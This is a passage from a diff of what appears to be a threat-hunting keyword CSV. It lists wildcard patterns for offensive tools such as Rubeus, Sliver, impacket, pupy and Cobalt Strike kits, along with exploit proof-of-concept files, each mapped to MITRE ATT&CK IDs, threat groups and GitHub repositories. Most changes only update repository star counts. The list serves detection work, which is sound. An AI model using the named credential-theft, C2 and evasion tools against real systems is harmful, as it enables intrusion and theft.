implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpc-msf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpcrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*rpcrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*rpcrt4_new.dll*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*rpcrt4_old.dll","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" -"*rpc-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*rpc-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*rpivot.zip*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpivot-master*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpm.torproject.org/*public_gpg.key*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rsactftool --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rsactftool* --dumpkey --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rshijack*","offensive_tool_keyword","rshijack","tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. then inject a tcp packet into the telnet connection:","T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004","TA0011 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/rshijack","1","0","N/A","N/A","5","402","41","2023-06-03T16:37:11Z","2018-02-23T02:21:45Z" -"*rsmudge/ElevateKit*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*rsmudge/ElevateKit*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*rsocx -l 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -r *:*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -t 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" @@ -15960,19 +16141,19 @@ "*rsocx-main.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*RtlDallas/KrakenMask*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" "*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*rubber_ducky.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Rubeus*currentluid*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus*harvest*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus*logonsession*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus*monitor*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.bin*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Rubeus.Commands*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*rubber_ducky.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Rubeus*currentluid*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*harvest*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*logonsession*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*monitor*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.bin*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Rubeus.Commands*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Rubeus.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*Rubeus.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*Rubeus.git*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.Kerberos*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.lib*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Rubeus.git*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.Kerberos*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.lib*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*rubeus.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusAskTgtMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RubeusASREPRoastManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -16003,37 +16184,37 @@ "*RubeusTriageManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*ruby CVE-202*-*.rb *","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" "*ruby poc-cve-202*-*.rb*","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation 